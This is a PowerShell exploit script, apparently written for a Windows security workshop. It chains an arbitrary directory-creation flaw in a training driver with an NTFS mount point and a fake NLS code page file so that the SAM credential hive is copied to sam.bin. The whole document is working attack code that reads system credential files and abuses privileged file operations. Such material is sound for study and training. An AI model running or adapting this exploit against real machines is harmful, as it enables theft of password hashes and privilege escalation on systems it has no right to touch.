directory_to_file.ps1

# Simple example when combined with an arbitrary direction creation
# vulnerability to read out the SAM registry hive file.
# Written by James Forshaw 2017

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl
{
    Param([int]$ControlCode)
    [NtApiDotNet.NtIoControlCode]::new("Unknown",`
        0x800 -bor $ControlCode, "Buffered", "Any")
}

function New-Directory {
  Param([string]$Filename)

  # Open the device driver.
  Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
    # Get IOCTL for ControlCreateDir (2)
    $ioctl = Get-DriverIoCtl -ControlCode 2
    # Convert DOS filename to NT
    $bytes = [Text.Encoding]::Unicode.GetBytes($Filename)
    $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
  }
}

function Remove-Directory {
  Param([string]$Filename)
  try {    
    Use-NtObject($file = Get-NtFile $Filename `
        -Access Delete `
        -Options DeleteOnClose,OpenReparsePoint,DirectoryFile) {
    } 
  } catch {
  }
}

try {
  # We'll use the CP 1337 file.
  $dir = "\SystemRoot\system32\c_1337.nls"
  Remove-Directory $dir

  # Create new directory.
  New-Directory $dir
  
  # Set directory as a mount point to the SAM hive file.
  $target_path = "\SystemRoot\system32\config\SAM"
  Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) {
    $file.SetMountPoint($target_path, $target_path)
  }

  # Get mapped file and write it to sam.bin
  Use-NtObject($map = [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
    Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
        $map.GetStream().CopyTo($output)
        Write-Host "Copied file"
    }
  }

  # Delete section object.
  Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                             -Access Delete) {
    $sect.MakeTemporary()
  }

  Remove-Directory $dir

} catch {
    Write-Host $_
}